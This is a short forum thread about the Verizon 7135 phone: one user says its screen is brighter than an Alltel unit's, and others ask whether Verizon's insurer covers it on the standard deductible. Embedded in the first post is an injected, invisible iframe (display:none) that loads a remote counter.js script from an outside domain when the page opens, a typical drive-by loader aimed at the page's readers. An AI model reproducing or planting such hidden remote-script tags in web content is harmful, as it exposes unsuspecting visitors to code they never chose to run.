    Verizon Screen

I had a damaged Alltel 7135 and just got my Verizon 7135. What's interesting is that at the exact same contrast and brightness settings, side by side the Verizon 7135 is DEFINITELY brighter than the Alltel 7135. It may be that the screen dulls a bit over time and that's why the Alltel screen was not as bright. It may also be that my Alltel 7135 just didn't have a great screen. I don't know the reason, but there absolutely is a very noticeable difference so I figured I'd just mention it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I've been hearing that since this phone is so expensive, that Assuron (Verizon's insurance) won't be covering this phone on the standard $50 deductible. Can anyone confirm or deny this? If my phone gets damaged, I'd hate to have to shell out another couple hundred dollars!

I've seen people say that a few times now... and also people saying they got nowhere. I think I'll try to call them this coming week to see what they say, especially if the 7135 is being sold in VZ stores (and is also available for replacement purposes in the VZ pipeline).
